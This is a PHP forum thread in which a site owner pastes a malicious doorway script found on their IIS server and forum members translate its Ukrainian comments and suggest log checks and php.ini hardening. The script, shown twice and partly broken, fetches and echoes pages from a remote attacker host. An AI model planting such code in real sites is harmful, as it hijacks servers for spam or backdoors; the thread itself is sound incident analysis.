PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.
 

All times are UTC - 5 hours




PostPosted: Sun Oct 19, 2014 11:36 pm 
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
There is a file called index.php which got loaded on our server. The code inside the PHP (below) seems malicious.

$key = array_search('', $_GET); if ($key == 'test') { $url_server = "http://fbschool.ru/door/test1.ru"."/".$key.".php"; } else { $url_server = "http://fbschool.ru/door/".str_replace('www.', '', $_SERVER[ 'SERVER_NAME' ])."/".$key.".php"; } //перевірка на то чи існує файл дора $Headers = @get_headers($url_server); if(strpos($Headers[0], '200')) { function get_curl ($url, $n) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $content); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 600); if ($n==0){ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);} $output = curl_exec ($ch); curl_close ($ch); return $output; } function get_fsockopen ($url, $n) { $post=""; $u = parse_url($url); if( $fp = fsockopen($u['host'],!empty($u['port']) ? $u['port'] : 80 )){ $headers = 'POST '. $u['path'] .' HTTP/1.0'. "\r\n"; $headers .= 'Host: '. $u['host'] ."\r\n"; if ($n==0){ $headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; } $headers .= 'Content-type: text/html' . "\r\n"; $headers .= 'Content-length: ' . strlen($post) . "\r\n"; $headers .= 'Connection: Close' . 
"\r\n\r\n"; $headers .= $post; fwrite($fp, $headers); $ret = ''; while( !feof($fp) ){ $ret .= fgets($fp,1024); } $html = substr($ret,strpos($ret,"\r\n\r\n") + 4); fclose($fp); } return $html; } if( function_exists("curl_init") ) { //берем сторінку дора $page_host = get_curl($url_server, 0); $page_host_arr = explode("\r\n", $page_host); for ($i=4;$i<=count($page_host_arr);$i++) $page_host_tmp .= $page_host_arr[$i]."\r\n"; //берем сторінку шелла $page = get_curl($page_host_arr[0], 1); } else { $page_host = get_fsockopen($url_server, 0); $page_host_arr = explode("\r\n", $page_host); for ($i=4;$i<=count($page_host_arr);$i++) $page_host_tmp .= $page_host_arr[$i]."\r\n"; $page = get_fsockopen($page_host_arr[0], 1); } //вирізаємо всі непотрібні теги $page = preg_replace('//i', '', $page); $page = preg_replace('//i', '', $page); $page = preg_replace('//i', '', $page); $page = preg_replace('/ ", $page, 1); //вставка контенту $page = preg_replace('//', " $page_host_tmp", $page, 1); echo $page; exit; }
 


I do not know if it is attempting to sell some unwanted spam products or open a backdoor as I did not want to infect my computer. I used http://global.sitesafety.trendmicro.com/result.php to check the link http://fbschool.ru/door/test1.ru but did not find any information.

What steps should I take?

Any advice would be appreciated.


PostPosted: Mon Oct 20, 2014 12:11 am 
Spammer :|

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6617
Location: WA, USA
Is it your own file? No? Then it shouldn't be there. Period.

Check the modification date on the file, then look through your access logs for an indication as to how they got it on your server.


PostPosted: Mon Oct 20, 2014 9:36 pm 
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks requinix,

It is not our file. Which access logs do I need to check? We are running Win 2008 with IIS. Our server admin does not have time for these tasks.


PostPosted: Mon Oct 20, 2014 10:44 pm 
Spammer :|

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6617
Location: WA, USA
If your admin "does not have time" to investigate an intrusion into a server he manages then you have a second problem to deal with.

IIS should be configured to record access (web page, AJAX requests, etc.) to a log file. You might have to go through the IIS configuration to find out where it is, though the IIS installation directory would be a good place to check first.


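One way to do the log search requinix describes, as an added example that is not from the thread: a small Python triage over IIS W3C log lines (the lines, field set, paths and IPs are constructed). It flags requests to the dropped index.php whose query string is a bare keyword, which is the form array_search('', $_GET) in the posted script turns into the remote doorway URL, and lists successful POST/PUT requests shortly before the first hit as candidates for how the file arrived.

```python
from datetime import datetime, timedelta
# Constructed IIS W3C log excerpt (not from the thread); only the fields
# this triage needs are kept, declared in a valid #Fields: header.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2014-10-18 02:11:05 GET /default.aspx - 203.0.113.7 200
2014-10-18 02:13:40 POST /admin/fileupload - 198.51.100.23 200
2014-10-18 02:14:02 GET /index.php - 198.51.100.23 200
2014-10-18 09:30:11 GET /index.php cheap-watches 192.0.2.55 200
2014-10-18 09:31:50 GET /index.php buy-pills 192.0.2.56 200
2014-10-18 09:40:00 GET /index.php page=2 192.0.2.57 200
"""

def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields: header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def when(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")

def doorway_hits(rows, stem="/index.php"):
    """Hits on the dropped file whose query holds a bare key (no '='), the
    form that array_search('', $_GET) in the posted script keys on."""
    return [r for r in rows
            if r["cs-uri-stem"].lower().endswith(stem)
            and r["cs-uri-query"] != "-"
            and any("=" not in p for p in r["cs-uri-query"].split("&"))]

def earliest_hit(rows, stem="/index.php"):
    """First request of any kind to the stem; compare it with the file's
    modification date, as requinix suggests, to bound when it was dropped."""
    hits = [r for r in rows if r["cs-uri-stem"].lower().endswith(stem)]
    return min(hits, key=when) if hits else None

def writes_before(rows, first, window=timedelta(hours=1)):
    """Successful POST/PUT requests in the window before the first hit:
    candidates for the request that put the file there."""
    if first is None:
        return []
    return [r for r in rows
            if r["cs-method"] in ("POST", "PUT")
            and r["sc-status"].startswith("2")
            and timedelta(0) <= when(first) - when(r) <= window]
```

Real IIS logs carry more fields (s-ip, cs(User-Agent), time-taken, ...); the parser takes whatever the #Fields: line declares, so it runs unchanged on them.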
PostPosted: Thu Oct 23, 2014 8:08 pm 
Moderator

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5978
Location: Odessa, Ukraine
Sidenote: The comments in the code are in Ukrainian. Interesting.


PostPosted: Thu Oct 23, 2014 10:14 pm 
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks requinix,
requinix wrote:
If your admin "does not have time" to investigate an intrusion into a server he manages then you have a second problem to deal with.


Agreed, but a lot of the time you don't have a choice and have to tolerate whoever manages the servers.
requinix wrote:
IIS should be configured to record access (web page, AJAX requests, etc.) to a log file. You might have to go through the IIS configuration to find out where it is, though the IIS installation directory would be a good place to check first.


Thanks, I will check that out. Are there any guides which explain how to lock down an IIS server, scan for PHP vulnerabilities, etc.?

I appreciate your time and assistance with this thread.


PostPosted: Thu Oct 23, 2014 10:17 pm 
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks Weirdan,
Weirdan wrote:
Sidenote: The comments in the code are in Ukrainian. Interesting.

Can you please tell us what they mean?

It appears the code tries to open a file from some remote server and then open a socket.

I do not know if it is attempting to sell some unwanted spam products or open a backdoor


PostPosted: Fri Oct 24, 2014 8:12 pm 
Moderator

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5978
Location: Odessa, Ukraine
Sure. Translator notes in square brackets (also formatted the code a bit to make it easier to read):
<?php
$key = array_search('', $_GET);
if ($key == 'test') {
        $url_server = "http://fbschool.ru/door/test1.ru" . "/" . $key . ".php";
} else {
        $url_server = "http://fbschool.ru/door/" . str_replace('www.', '', $_SERVER['SERVER_NAME']) . "/" . $key . ".php";
}

// перевірка на то чи існує файл дора
// checking if the door [backdoor or doorway?] file exists
$Headers = @get_headers($url_server);

if (strpos($Headers[0], '200')) {

        function get_curl($url, $n) {
                $ch = curl_init($url);
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $content);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_TIMEOUT, 600);
                if ($n == 0) {
                        curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
                }
                $output = curl_exec ($ch);
                curl_close($ch);
                return $output;
        }

        function get_fsockopen($url, $n) {
                $post = "";
                $u = parse_url($url);
                if ($fp = fsockopen($u['host'], !empty($u['port']) ? $u['port'] : 80)) {

                        $headers = 'POST ' . $u['path'] . ' HTTP/1.0' . "\r\n";
                        $headers .= 'Host: ' . $u['host'] . "\r\n";
                        if ($n == 0) {
                                $headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
                        }
                        $headers .= 'Content-type: text/html' . "\r\n";
                        $headers .= 'Content-length: ' . strlen($post) . "\r\n";
                        $headers .= 'Connection: Close' . "\r\n\r\n";
                        $headers .= $post;
                        fwrite($fp, $headers);

                        $ret = '';
                        while (!feof($fp)) {
                                $ret .= fgets($fp, 1024);
                        }
                        $html = substr($ret, strpos($ret, "\r\n\r\n") + 4);
                        fclose($fp);
                }
                return $html;
        }
        if (function_exists("curl_init")) {
                // берем сторінку дора
                // getting the door [see note above] page
                $page_host = get_curl($url_server, 0);
                $page_host_arr = explode("\r\n", $page_host);
                for ($i = 4; $i <= count($page_host_arr); $i++)
                        $page_host_tmp .= $page_host_arr[$i] . "\r\n";

                // берем сторінку шелла
                // getting the shell page
                $page = get_curl($page_host_arr[0], 1);
        } else {
                $page_host = get_fsockopen($url_server, 0);
                $page_host_arr = explode("\r\n", $page_host);
                for ($i = 4; $i <= count($page_host_arr); $i++)
                        $page_host_tmp .= $page_host_arr[$i] . "\r\n";
                $page = get_fsockopen($page_host_arr[0], 1);
        }
        // вирізаємо всі непотрібні теги
        // removing unnecessary tags
        $page = preg_replace('//i', '', $page);
        $page = preg_replace('//i', '', $page);
        $page = preg_replace('//i', '', $page);
        $page = preg_replace('/ ", $page, 1); // [syntax error here]
        // вставка контенту
        // inserting content
        $page = preg_replace('
//', " $page_host_tmp", $page, 1);
        echo $page;
        exit;
}
 


The code appears to fetch a newline-delimited file from that server, then use data from it to get another file, which gets echoed. The code as you posted it contains a syntax error, and those preg_replace calls seem to be missing the actual regexp (first parameter).


PostPosted: Sat Oct 25, 2014 12:38 am 
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks Weirdan,
Weirdan wrote:
Sure. Translator notes in square brackets (also formatted the code a bit to make it easier to read):
The code appears to fetch a newline-delimited file from that server, then use data from it to get another file, which gets echoed. The code as you posted it contains a syntax error, and those preg_replace calls seem to be missing the actual regexp (first parameter).


The file was using the eval function to evaluate a remotely fetched file using file_get_contents. It seems like an XSS exploit.

I did not want to run the file so used echo instead of eval to know the contents of the remote file being loaded and posted it here.

1. We do not use file_get_contents calls in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?

2. What are the ways we can lock down the server from running such XSS exploits?

Thanks a lot for your time and advice.


PostPosted: Mon Oct 27, 2014 4:21 am 
Moderator

Joined: Mon Nov 03, 2003 7:13 pm
Posts: 5978
Location: Odessa, Ukraine
p_s_92 wrote:
1. We do not use file_get_contents calls in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?

You could use the disable_functions php.ini directive. However, file_get_contents is often used by third-party libraries. There are another two options you may want to disable instead: allow_url_fopen and allow_url_include.
These wouldn't help to prevent execution of the script you posted, though, as it uses curl and fsockopen. You may want to disable eval(), but even then it would be possible to fetch the script from a remote server, store it somewhere (in the temp folder, possibly) and do a local include.

Quote:
2. What are the ways we can lock down the server from running such XSS exploits?

You need to find out how that file appeared on your server in the first place. Some good general practices are: escape output (for HTML), filter and validate input, escape input (for SQL), disable execution of uploaded files (one could put PHP code in image EXIF tags, for example), make sure the computer you use to upload your sources to the server is secure (change your FTP passwords, run a virus scan, use SFTP instead of FTP, etc.).


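An added example (not from the thread) of checking the php.ini directives Weirdan lists: a Python reader for the relevant lines, run over a constructed weak excerpt and a constructed hardened one. It also encodes two caveats: allow_url_fopen and allow_url_include only govern PHP's stream wrappers, so curl and fsockopen (which the posted script uses) have to be named in disable_functions to be blocked, and eval is a language construct that disable_functions cannot switch off.

```python
# Added example (not from the thread): audit the php.ini directives the
# thread discusses. Both excerpts below are constructed.
WEAK_INI = """\
; constructed php.ini excerpt: settings that let the posted script run
allow_url_fopen = On
allow_url_include = Off
disable_functions =
"""

HARDENED_INI = """\
; constructed php.ini excerpt with the thread's advice applied
allow_url_fopen = Off
allow_url_include = Off
disable_functions = curl_init,curl_exec,fsockopen,pfsockopen,exec,shell_exec,system,passthru
"""
# Functions the posted script needs for its remote fetch. Blocking them also
# breaks legitimate HTTP clients, so treat the finding as something to weigh.
# eval is not listed: it is a language construct, not a function, and
# disable_functions cannot switch it off (the audit reports that mistake).
REMOTE_FETCH = {"curl_init", "curl_exec", "fsockopen", "pfsockopen"}

def parse_ini(text):
    """Minimal php.ini reader: 'key = value' lines, ';' comments, no sections."""
    conf = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            conf[key.lower()] = value.strip('"')
    return conf

def is_off(value):
    """php.ini boolean: Off/0/false/no/none/'' are false; anything else is true."""
    return value.strip().lower() in ("", "off", "0", "false", "no", "none")

def audit(conf):
    """Findings against the thread's advice; an empty list means it is applied."""
    findings = []
    if not is_off(conf.get("allow_url_fopen", "On")):
        findings.append("allow_url_fopen is On: file_get_contents/fopen accept URLs")
    if not is_off(conf.get("allow_url_include", "Off")):
        findings.append("allow_url_include is On: include/require accept URLs")
    disabled = {f.strip() for f in conf.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(REMOTE_FETCH - disabled)
    if missing:
        findings.append("not in disable_functions: " + ", ".join(missing))
    if "eval" in disabled:
        findings.append("eval in disable_functions has no effect (language construct)")
    return findings
```

The defaults used when a directive is absent (allow_url_fopen On, allow_url_include Off) are PHP's own, so a php.ini that never mentions them is reported correctly.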
PostPosted: Sun Nov 02, 2014 11:40 am 
Forum Newbie

Joined: Fri May 28, 2010 6:17 pm
Posts: 8
Thanks Weirdan,

I am sorry for the late reply.

Weirdan wrote:
p_s_92 wrote:
1. We do not use file_get_contents calls in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?

You could use the disable_functions php.ini directive. However, file_get_contents is often used by third-party libraries. There are another two options you may want to disable instead: allow_url_fopen and allow_url_include.
These wouldn't help to prevent execution of the script you posted, though, as it uses curl and fsockopen. You may want to disable eval(), but even then it would be possible to fetch the script from a remote server, store it somewhere (in the temp folder, possibly) and do a local include.


Yes, most ways can be circumvented.

Quote:
2. What are the ways we can lock down the server from running such XSS exploits?
You need to find out how that file appeared on your server in the first place. Some good general practices are: escape output (for HTML), filter and validate input, escape input (for SQL), disable execution of uploaded files (one could put PHP code in image EXIF tags, for example), make sure the computer you use to upload your sources to the server is secure (change your FTP passwords, run a virus scan, use SFTP instead of FTP, etc.).

The server admin did not have time. We are using Mura CMS. He told us that it needs to be upgraded and that this could be the reason the file got there. We filter and validate input, and escape input (for SQL). Escaping output is something we need to focus on.

1. How do you disable execution of uploaded files (one could put php code in image EXIF tags, for example)?

Thanks a lot for all your time and assistance with this thread.

